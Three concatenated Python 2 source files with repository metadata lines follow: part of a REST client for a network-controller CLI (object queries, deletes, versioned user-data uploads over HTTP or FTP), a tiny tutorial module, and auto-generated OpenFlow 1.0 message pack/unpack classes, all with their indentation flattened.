url_cache.save_url(url, entries)
return entries
def rest_query_objects(self, obj_type, query_params=None):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
if query_params:
url += '?'
# Convert any data:None fields to <id>__isnull=True
non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
for (n,v) in query_params.items()])
url += urllib.urlencode(non_null_query_params)
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request(url)
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
#
# either must contain a key/val and any other required data
# of the key must be a dictionary identifying the item to delete.
def rest_delete_object(self, obj_type, key, val = None):
dict_ = {}
url = self.entry_post_url % (self.controller, obj_type)
if val == None:
if not type(key) == type(dict_):
return None
dict_ = key
else:
url += "?%s__exact=%s" % (key, urllib.quote_plus(val))
# LOOK! I'm not sure this works the way it seems to me it's
# designed to work. I think the intent is that you can specify
# query parameters in the key argument which controls which
# instance(s) should be deleted. But when I try it it seems to
# always delete all instances, so it seems like the parameters
# don't filter properly when passed via the POST data as opposed
# to being specified as query parameters in the URL. The latter
# way does work -- see rest_delete_objects that follows this.
data = self.rest_post_request(url, dict_, 'DELETE')
# LOOK! successful stuff should be returned in json too.
if data != "deleted":
dict_ = json.loads(data)
return dict_
url_cache.clear_cached_urls()
def rest_delete_objects(self, obj_type, query_params):
url = self.entry_post_url % (self.controller, obj_type)
if query_params:
url += '?'
# Convert any data:None fields to <id>__isnull=True
non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
for (n,v) in query_params.items()])
url += urllib.urlencode(non_null_query_params)
data = self.rest_post_request(url, {}, 'DELETE')
# LOOK! successful stuff should be returned in json too.
if data != "deleted":
result = json.loads(data)
return result
url_cache.clear_cached_urls()
def rest_update_object(self, obj_type, obj_key_name, obj_key_val, obj_data):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.entry_post_url % (self.controller, obj_type)
url += "?%s=%s" % (obj_key_name, urllib.quote_plus(obj_key_val)) # add a query string
data = self.rest_post_request(url, obj_data)
# LOOK! successful stuff should be returned in json too.
result = json.loads(data)
if result.get('description', '') != "saved":
return result
url_cache.clear_cached_urls()
def set_user_data_file(self, name, text):
url = self.user_data_url % (self.controller)
version = 1 # default
# find the latest version for a name
existing_data = self.get_user_data_table(name, "latest")
if len(existing_data) > 0: # should be at most 1, but just in case...
version = max([int(f['version']) for f in existing_data]) + 1 # LOOK! race?
length = len(text)
# LOOK! what to do about time in a distributed system!
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%d.%H:%M:%S")
url += "%s/timestamp=%s/version=%s/length=%s/" % (name, timestamp, version, length)
return self.copy_text_to_url(url, text)
def get_user_data_file(self, name):
url = self.user_data_url % (self.controller)
url += name + "/"
return self.rest_simple_request(url)
def delete_user_data_file(self, name):
url = self.user_data_url % (self.controller)
url += name + "/"
data = self.rest_post_request(url, {}, 'DELETE')
if data != "deleted":
result = json.loads(data)
return result
def get_user_data_table(self, name=None, show_version="latest"):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return None
url = self.user_data_url % self.controller
if name:
url += "?name__startswith=%s" % name
data = self.rest_simple_request(url)
new_data = []
data = json.loads(data)
latest_versions = {} # dict of latest version per name
for d in data: # list of dicts
l = d['name'].split('/') # ex: startup/timestamp=2010-11-03.05:51:27/version=1/length=2038
nd = dict([item.split('=') for item in l[1:]])
nd['name'] = l[0]
nd['full_name'] = d['name']
new_data.append(nd)
if not nd['name'] in latest_versions or int(nd['version']) > int(latest_versions[nd['name']]):
latest_versions[nd['name']] = nd['version'] # initialize first time
# prune if needed to a name or a particular version
if name:
new_data = [ nd for nd in new_data if nd['name'].startswith(name) ]
if show_version == "latest":
new_data = [ nd for nd in new_data if not int(nd['version']) < int(latest_versions[nd['name']]) ]
elif show_version != "all":
new_data = [ nd for nd in new_data if nd['version'] == show_version ]
return new_data
# LOOK! looks a lot like a rest_post_request except we don't jsonify and we handle
# errors differently... refactor? Same with get_text and rest_simple_request
def copy_text_to_url(self, url, src_text, message = None):
post_data = src_text
if url.startswith('ftp://'):
url_suffix = url[6:]
user = 'anonymous'
password = ''
if url_suffix.find('@') != -1:
url_parts = url_suffix.split('@')
url_user_and_password = url_parts[0]
url_suffix = url_parts[1]
if url_user_and_password.find(':') != -1:
user_and_password = url_user_and_password.split(':')
user = user_and_password[0]
password = user_and_password[1]
else:
user = url_user_and_password
host = url_suffix
path = None
if url_suffix.find('/'):
url_suffix_parts = url_suffix.split('/')
host = url_suffix_parts[0]
path = url_suffix_parts[1]
ftp_target = ftplib.FTP(host, user, password)
ftp_target.storbinary('STOR %s' % path, StringReader(post_data))
# apparently, storbinary doesn't provide a return value
result = { "result" : "success" } # don't display any other error messages
else:
request = urllib2.Request(url, post_data, {'Content-Type':'text/plain'})
request.get_method = lambda: 'PUT'
if self.display_rest:
print "REST-TEXT-TO:", request
response = urllib2.urlopen(request)
result = response.read()
if self.display_rest_reply:
print 'REST-TEXT-TO: %s reply "%s"' % (request, result)
return result
def get_text_from_url(self, url):
if self.display_rest:
print "REST-TEXT-FROM:", url
result = urllib2.urlopen(url).read()
if self.display_rest_reply:
print 'REST-TEXT-FROM: %s result:"%s"' % (url, result)
return result
| opennetworkinglab/spring-open-cli | cli/storeclient.py | Python | epl-1.0 | 15,736 |
#!/usr/bin/python
#coding:utf-8
print 'start to load...'
import sys
name = 42
def func(): pass
class kclass : pass
print 'done loading.' | gensmusic/test | l/python/book/learning-python/c22/module3.py | Python | gpl-2.0 | 137 |
# Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University
# Copyright (c) 2011, 2012 Open Networking Foundation
# Copyright (c) 2012, 2013 Big Switch Networks, Inc.
# See the file LICENSE.pyloxi which should have been included in the source distribution
# Automatically generated by LOXI from template module.py
# Do not modify
import struct
import loxi
import util
import loxi.generic_util
import sys
ofp = sys.modules['loxi.of10']
class message(loxi.OFObject):
subtypes = {}
version = 1
def __init__(self, type=None, xid=None):
if type != None:
self.type = type
else:
self.type = 0
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('B', 1)
subclass = message.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = message()
_version = reader.read("!B")[0]
assert(_version == 1)
obj.type = reader.read("!B")[0]
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.type != other.type: return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("message {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
class stats_reply(message):
subtypes = {}
version = 1
type = 17
def __init__(self, xid=None, stats_type=None, flags=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if stats_type != None:
self.stats_type = stats_type
else:
self.stats_type = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 8)
subclass = stats_reply.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.stats_type = reader.read("!H")[0]
obj.flags = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.stats_type != other.stats_type: return False
if self.flags != other.flags: return False
return True
def pretty_print(self, q):
q.text("stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
message.subtypes[17] = stats_reply
class aggregate_stats_reply(stats_reply):
version = 1
type = 17
stats_type = 2
def __init__(self, xid=None, flags=None, packet_count=None, byte_count=None, flow_count=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if packet_count != None:
self.packet_count = packet_count
else:
self.packet_count = 0
if byte_count != None:
self.byte_count = byte_count
else:
self.byte_count = 0
if flow_count != None:
self.flow_count = flow_count
else:
self.flow_count = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(struct.pack("!Q", self.packet_count))
packed.append(struct.pack("!Q", self.byte_count))
packed.append(struct.pack("!L", self.flow_count))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = aggregate_stats_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 17)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 2)
obj.flags = reader.read("!H")[0]
obj.packet_count = reader.read("!Q")[0]
obj.byte_count = reader.read("!Q")[0]
obj.flow_count = reader.read("!L")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.packet_count != other.packet_count: return False
if self.byte_count != other.byte_count: return False
if self.flow_count != other.flow_count: return False
return True
def pretty_print(self, q):
q.text("aggregate_stats_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("packet_count = ");
q.text("%#x" % self.packet_count)
q.text(","); q.breakable()
q.text("byte_count = ");
q.text("%#x" % self.byte_count)
q.text(","); q.breakable()
q.text("flow_count = ");
q.text("%#x" % self.flow_count)
q.breakable()
q.text('}')
stats_reply.subtypes[2] = aggregate_stats_reply
class stats_request(message):
subtypes = {}
version = 1
type = 16
def __init__(self, xid=None, stats_type=None, flags=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if stats_type != None:
self.stats_type = stats_type
else:
self.stats_type = 0
if flags != None:
self.flags = flags
else:
self.flags = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 8)
subclass = stats_request.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.stats_type = reader.read("!H")[0]
obj.flags = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.stats_type != other.stats_type: return False
if self.flags != other.flags: return False
return True
def pretty_print(self, q):
q.text("stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.breakable()
q.text('}')
message.subtypes[16] = stats_request
class aggregate_stats_request(stats_request):
version = 1
type = 16
stats_type = 2
def __init__(self, xid=None, flags=None, match=None, table_id=None, out_port=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if flags != None:
self.flags = flags
else:
self.flags = 0
if match != None:
self.match = match
else:
self.match = ofp.match()
if table_id != None:
self.table_id = table_id
else:
self.table_id = 0
if out_port != None:
self.out_port = out_port
else:
self.out_port = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.stats_type))
packed.append(struct.pack("!H", self.flags))
packed.append(self.match.pack())
packed.append(struct.pack("!B", self.table_id))
packed.append('\x00' * 1)
packed.append(util.pack_port_no(self.out_port))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = aggregate_stats_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 16)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_stats_type = reader.read("!H")[0]
assert(_stats_type == 2)
obj.flags = reader.read("!H")[0]
obj.match = ofp.match.unpack(reader)
obj.table_id = reader.read("!B")[0]
reader.skip(1)
obj.out_port = util.unpack_port_no(reader)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.flags != other.flags: return False
if self.match != other.match: return False
if self.table_id != other.table_id: return False
if self.out_port != other.out_port: return False
return True
def pretty_print(self, q):
q.text("aggregate_stats_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("flags = ");
q.text("%#x" % self.flags)
q.text(","); q.breakable()
q.text("match = ");
q.pp(self.match)
q.text(","); q.breakable()
q.text("table_id = ");
q.text("%#x" % self.table_id)
q.text(","); q.breakable()
q.text("out_port = ");
q.text(util.pretty_port(self.out_port))
q.breakable()
q.text('}')
stats_request.subtypes[2] = aggregate_stats_request
class error_msg(message):
subtypes = {}
version = 1
type = 1
def __init__(self, xid=None, err_type=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if err_type != None:
self.err_type = err_type
else:
self.err_type = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!H', 8)
subclass = error_msg.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.err_type = reader.read("!H")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.err_type != other.err_type: return False
return True
def pretty_print(self, q):
q.text("error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[1] = error_msg
class bad_action_error_msg(error_msg):
version = 1
type = 1
err_type = 2
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bad_action_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 2)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bad_action_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
error_msg.subtypes[2] = bad_action_error_msg
class bad_request_error_msg(error_msg):
version = 1
type = 1
err_type = 1
def __init__(self, xid=None, code=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if code != None:
self.code = code
else:
self.code = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!H", self.err_type))
packed.append(struct.pack("!H", self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bad_request_error_msg()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 1)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_err_type = reader.read("!H")[0]
assert(_err_type == 1)
obj.code = reader.read("!H")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.code != other.code: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bad_request_error_msg {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("code = ");
q.text("%#x" % self.code)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
error_msg.subtypes[1] = bad_request_error_msg
class barrier_reply(message):
version = 1
type = 19
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = barrier_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 19)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("barrier_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[19] = barrier_reply
class barrier_request(message):
version = 1
type = 18
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = barrier_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 18)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("barrier_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
message.subtypes[18] = barrier_request
class experimenter(message):
subtypes = {}
version = 1
type = 4
def __init__(self, xid=None, experimenter=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if experimenter != None:
self.experimenter = experimenter
else:
self.experimenter = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 8)
subclass = experimenter.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = experimenter()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
obj.experimenter = reader.read("!L")[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.experimenter != other.experimenter: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("experimenter {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
message.subtypes[4] = experimenter
class bsn_header(experimenter):
subtypes = {}
version = 1
type = 4
experimenter = 6035143
def __init__(self, xid=None, subtype=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if subtype != None:
self.subtype = subtype
else:
self.subtype = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
subtype, = reader.peek('!L', 12)
subclass = bsn_header.subtypes.get(subtype)
if subclass:
return subclass.unpack(reader)
obj = bsn_header()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
obj.subtype = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.subtype != other.subtype: return False
return True
def pretty_print(self, q):
q.text("bsn_header {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
experimenter.subtypes[6035143] = bsn_header
class bsn_bw_clear_data_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 22
def __init__(self, xid=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_clear_data_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 22)
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_clear_data_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[22] = bsn_bw_clear_data_reply
class bsn_bw_clear_data_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 21
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_clear_data_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 21)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_clear_data_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
bsn_header.subtypes[21] = bsn_bw_clear_data_request
class bsn_bw_enable_get_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 20
def __init__(self, xid=None, enabled=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if enabled != None:
self.enabled = enabled
else:
self.enabled = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.enabled))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_enable_get_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 20)
obj.enabled = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.enabled != other.enabled: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_enable_get_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("enabled = ");
q.text("%#x" % self.enabled)
q.breakable()
q.text('}')
bsn_header.subtypes[20] = bsn_bw_enable_get_reply
class bsn_bw_enable_get_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 19
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_enable_get_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 19)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_enable_get_request {")
